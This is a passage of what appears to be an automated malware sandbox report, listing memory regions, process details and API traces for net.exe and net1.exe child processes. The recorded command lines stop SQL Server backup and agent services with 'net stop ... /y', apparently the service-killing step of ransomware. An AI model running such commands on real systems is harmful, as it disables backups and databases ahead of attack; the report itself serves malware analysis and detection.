"c:\\windows\\system32\\net1.exe") Region: id = 13153 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13154 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13155 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13156 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13157 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13158 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13159 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 13160 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13161 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13162 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13163 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13183 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13184 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 13185 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 13186 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13187 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13188 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13189 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13190 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13191 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13192 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13193 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13194 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13195 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13196 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13197 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13198 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13199 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13200 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13201 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13214 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 922 os_tid = 0x3b8 [0121.350] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fed0 | out: lpSystemTimeAsFileTime=0x18fed0*(dwLowDateTime=0xfd7323d0, dwHighDateTime=0x1d48689)) [0121.350] GetCurrentProcessId () returned 0xb70 [0121.350] GetCurrentThreadId () returned 0x3b8 [0121.350] GetTickCount () returned 0x27f9a [0121.350] QueryPerformanceCounter (in: lpPerformanceCount=0x18fed8 | out: lpPerformanceCount=0x18fed8*=1816826800000) returned 1 [0121.351] GetModuleHandleW (lpModuleName=0x0) returned 0xff8a0000 [0121.351] __set_app_type (_Type=0x1) [0121.351] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8b9c9c) returned 0x0 [0121.351] __getmainargs (in: _Argc=0xff8c4780, _Argv=0xff8c4790, _Env=0xff8c4788, _DoWildCard=0, _StartInfo=0xff8c479c | out: _Argc=0xff8c4780, _Argv=0xff8c4790, _Env=0xff8c4788) returned 0 [0121.351] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.351] GetConsoleOutputCP () returned 0x1b5 [0121.353] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8ccec0 | out: lpCPInfo=0xff8ccec0) returned 1 [0121.353] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0121.361] sprintf_s (in: _DstBuf=0x18fe78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0121.361] setlocale (category=0, locale=".437") returned="English_United States.437" [0121.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0121.362] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0121.363] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"SQL Backups\" /y" [0121.363] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0121.363] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0121.363] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fe68 | out: Buffer=0x18fe68*=0x1f4d50) returned 0x0 [0121.363] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fe68 | out: Buffer=0x18fe68*=0x1fc100) returned 0x0 [0121.363] _fileno (_File=0x7fefdba2a80) returned 0 [0121.363] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0121.363] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0121.363] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0121.363] _wcsicmp (_String1="config", _String2="stop") returned -16 [0121.363] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0121.363] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0121.363] _wcsicmp (_String1="file", _String2="stop") returned -13 [0121.363] _wcsicmp (_String1="files", _String2="stop") returned -13 [0121.363] _wcsicmp (_String1="group", _String2="stop") returned -12 [0121.363] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0121.363] _wcsicmp (_String1="help", _String2="stop") returned -11 [0121.364] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0121.364] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0121.364] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0121.364] _wcsicmp (_String1="session", _String2="stop") returned -15 [0121.364] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0121.364] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0121.364] _wcsicmp (_String1="share", _String2="stop") returned -12 [0121.364] _wcsicmp (_String1="start", _String2="stop") returned -14 [0121.364] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0121.364] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0121.364] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0121.364] _wcsicmp (_String1="accounts", _String2="SQL Backups") returned -18 [0121.364] _wcsicmp (_String1="computer", _String2="SQL Backups") returned -16 [0121.364] _wcsicmp (_String1="config", _String2="SQL Backups") returned -16 [0121.364] _wcsicmp (_String1="continue", _String2="SQL Backups") returned -16 [0121.364] _wcsicmp (_String1="cont", _String2="SQL Backups") returned -16 [0121.364] _wcsicmp (_String1="file", _String2="SQL Backups") returned -13 [0121.364] _wcsicmp (_String1="files", _String2="SQL Backups") returned -13 [0121.364] _wcsicmp (_String1="group", _String2="SQL Backups") returned -12 [0121.364] _wcsicmp (_String1="groups", _String2="SQL Backups") returned -12 [0121.364] _wcsicmp (_String1="help", _String2="SQL Backups") returned -11 [0121.364] _wcsicmp (_String1="helpmsg", _String2="SQL Backups") returned -11 [0121.364] _wcsicmp (_String1="localgroup", _String2="SQL Backups") returned -7 [0121.364] _wcsicmp (_String1="pause", _String2="SQL Backups") returned -3 [0121.364] _wcsicmp (_String1="session", _String2="SQL Backups") returned -12 [0121.364] _wcsicmp (_String1="sessions", _String2="SQL Backups") returned -12 [0121.364] _wcsicmp (_String1="sess", _String2="SQL Backups") returned -12 [0121.364] _wcsicmp (_String1="share", _String2="SQL Backups") returned -9 [0121.364] _wcsicmp (_String1="start", _String2="SQL Backups") returned 3 [0121.364] _wcsicmp (_String1="stats", _String2="SQL Backups") returned 3 [0121.365] _wcsicmp (_String1="statistics", _String2="SQL Backups") returned 3 [0121.365] _wcsicmp (_String1="stop", _String2="SQL Backups") returned 3 [0121.365] _wcsicmp (_String1="time", _String2="SQL Backups") returned 1 [0121.365] _wcsicmp (_String1="user", _String2="SQL Backups") returned 2 [0121.365] _wcsicmp (_String1="users", _String2="SQL Backups") returned 2 [0121.365] _wcsicmp (_String1="msg", _String2="SQL Backups") returned -6 [0121.365] _wcsicmp (_String1="messenger", _String2="SQL Backups") returned -6 [0121.365] _wcsicmp (_String1="receiver", _String2="SQL Backups") returned -1 [0121.365] _wcsicmp (_String1="rcv", _String2="SQL Backups") returned -1 [0121.365] _wcsicmp (_String1="netpopup", _String2="SQL Backups") returned -5 [0121.365] _wcsicmp (_String1="redirector", _String2="SQL Backups") returned -1 [0121.365] _wcsicmp (_String1="redir", _String2="SQL Backups") returned -1 [0121.365] _wcsicmp (_String1="rdr", _String2="SQL Backups") returned -1 [0121.365] _wcsicmp (_String1="workstation", _String2="SQL Backups") returned 4 [0121.365] _wcsicmp (_String1="work", _String2="SQL Backups") returned 4 [0121.365] _wcsicmp (_String1="wksta", _String2="SQL Backups") returned 4 [0121.365] _wcsicmp (_String1="prdr", _String2="SQL Backups") returned -3 [0121.365] _wcsicmp (_String1="devrdr", _String2="SQL Backups") returned -15 [0121.365] _wcsicmp (_String1="lanmanworkstation", _String2="SQL Backups") returned -7 [0121.365] _wcsicmp (_String1="server", _String2="SQL Backups") returned -12 [0121.365] _wcsicmp (_String1="svr", _String2="SQL Backups") returned 5 [0121.365] _wcsicmp (_String1="srv", _String2="SQL Backups") returned 1 [0121.365] _wcsicmp (_String1="lanmanserver", _String2="SQL Backups") returned -7 [0121.365] _wcsicmp (_String1="alerter", _String2="SQL Backups") returned -18 [0121.365] _wcsicmp (_String1="netlogon", _String2="SQL Backups") returned -5 [0121.365] _wcsupr (in: _String="SQL Backups" | out: _String="SQL BACKUPS") returned="SQL BACKUPS" [0121.366] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1fce10 [0121.376] GetServiceKeyNameW (in: hSCManager=0x1fce10, lpDisplayName="SQL BACKUPS", lpServiceName=0xff8c5750, lpcchBuffer=0x18fd88 | out: lpServiceName="", lpcchBuffer=0x18fd88) returned 0 [0121.377] _wcsicmp (_String1="msg", _String2="SQL BACKUPS") returned -6 [0121.377] _wcsicmp (_String1="messenger", _String2="SQL BACKUPS") returned -6 [0121.377] _wcsicmp (_String1="receiver", _String2="SQL BACKUPS") returned -1 [0121.377] _wcsicmp (_String1="rcv", _String2="SQL BACKUPS") returned -1 [0121.377] _wcsicmp (_String1="redirector", _String2="SQL BACKUPS") returned -1 [0121.377] _wcsicmp (_String1="redir", _String2="SQL BACKUPS") returned -1 [0121.377] _wcsicmp (_String1="rdr", _String2="SQL BACKUPS") returned -1 [0121.377] _wcsicmp (_String1="workstation", _String2="SQL BACKUPS") returned 4 [0121.377] _wcsicmp (_String1="work", _String2="SQL BACKUPS") returned 4 [0121.377] _wcsicmp (_String1="wksta", _String2="SQL BACKUPS") returned 4 [0121.377] _wcsicmp (_String1="prdr", _String2="SQL BACKUPS") returned -3 [0121.377] _wcsicmp (_String1="devrdr", _String2="SQL BACKUPS") returned -15 [0121.377] _wcsicmp (_String1="lanmanworkstation", _String2="SQL BACKUPS") returned -7 [0121.377] _wcsicmp (_String1="server", _String2="SQL BACKUPS") returned -12 [0121.377] _wcsicmp (_String1="svr", _String2="SQL BACKUPS") returned 5 [0121.377] _wcsicmp (_String1="srv", _String2="SQL BACKUPS") returned 1 [0121.377] _wcsicmp (_String1="lanmanserver", _String2="SQL BACKUPS") returned -7 [0121.377] _wcsicmp (_String1="alerter", _String2="SQL BACKUPS") returned -18 [0121.377] _wcsicmp (_String1="netlogon", _String2="SQL BACKUPS") returned -5 [0121.377] NetServiceControl (in: servername=0x0, service="SQL BACKUPS", opcode=0x0, arg=0x0, bufptr=0x18fd90 | out: bufptr=0x18fd90) returned 0x889 [0121.378] wcscpy_s (in: _Destination=0xff8c80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0121.378] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0121.379] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8c5b50, nSize=0x800, Arguments=0xff8c7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0121.381] GetFileType (hFile=0xb) returned 0x2 [0121.381] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fc58 | out: lpMode=0x18fc58) returned 1 [0121.381] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8c5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18fc50, lpReserved=0x0 | out: lpBuffer=0xff8c5b50*, lpNumberOfCharsWritten=0x18fc50*=0x1e) returned 1 [0121.381] GetFileType (hFile=0xb) returned 0x2 [0121.382] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fc58 | out: lpMode=0x18fc58) returned 1 [0121.382] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18fc50, lpReserved=0x0 | out: lpBuffer=0xff8a1efc*, lpNumberOfCharsWritten=0x18fc50*=0x2) returned 1 [0121.382] _ultow (in: _Dest=0x889, _Radix=1637568 | out: _Dest=0x889) returned="2185" [0121.382] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8c5b50, nSize=0x800, Arguments=0xff8c7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0121.382] GetFileType (hFile=0xb) returned 0x2 [0121.382] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fc58 | out: lpMode=0x18fc58) returned 1 [0121.382] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8c5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18fc50, lpReserved=0x0 | out: lpBuffer=0xff8c5b50*, lpNumberOfCharsWritten=0x18fc50*=0x34) returned 1 [0121.383] GetFileType (hFile=0xb) returned 0x2 [0121.383] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fc58 | out: lpMode=0x18fc58) returned 1 [0121.383] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18fc50, lpReserved=0x0 | out: lpBuffer=0xff8a1efc*, lpNumberOfCharsWritten=0x18fc50*=0x2) returned 1 [0121.383] NetApiBufferFree (Buffer=0x1f4d50) returned 0x0 [0121.383] NetApiBufferFree (Buffer=0x1fc100) returned 0x0 [0121.383] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"SQL Backups\" /y" [0121.384] exit (_Code=2) Process: id = "377" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7772a000" os_pid = "0xda0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLServerADHelper /y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13164 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13165 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13166 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13167 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13168 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13169 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13170 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13171 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13172 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13173 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13174 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13175 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13176 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13177 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13178 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 13179 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13180 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13181 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13182 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13319 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13320 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 13321 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 13322 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13323 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 13324 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 13325 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 13326 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13327 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13328 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13329 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13330 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13331 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13332 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13333 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13334 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 923 os_tid = 0xcbc Process: id = "378" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x72ed3000" os_pid = "0xd9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "367" os_parent_pid = "0x13f4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$CITRIX_METAFRAME /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13202 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13203 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13204 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13205 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 13206 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13207 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13208 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13209 start_va = 0xff8a0000 end_va = 0xff8d2fff entry_point = 0xff8a0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13210 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13211 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13212 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13213 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13215 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: 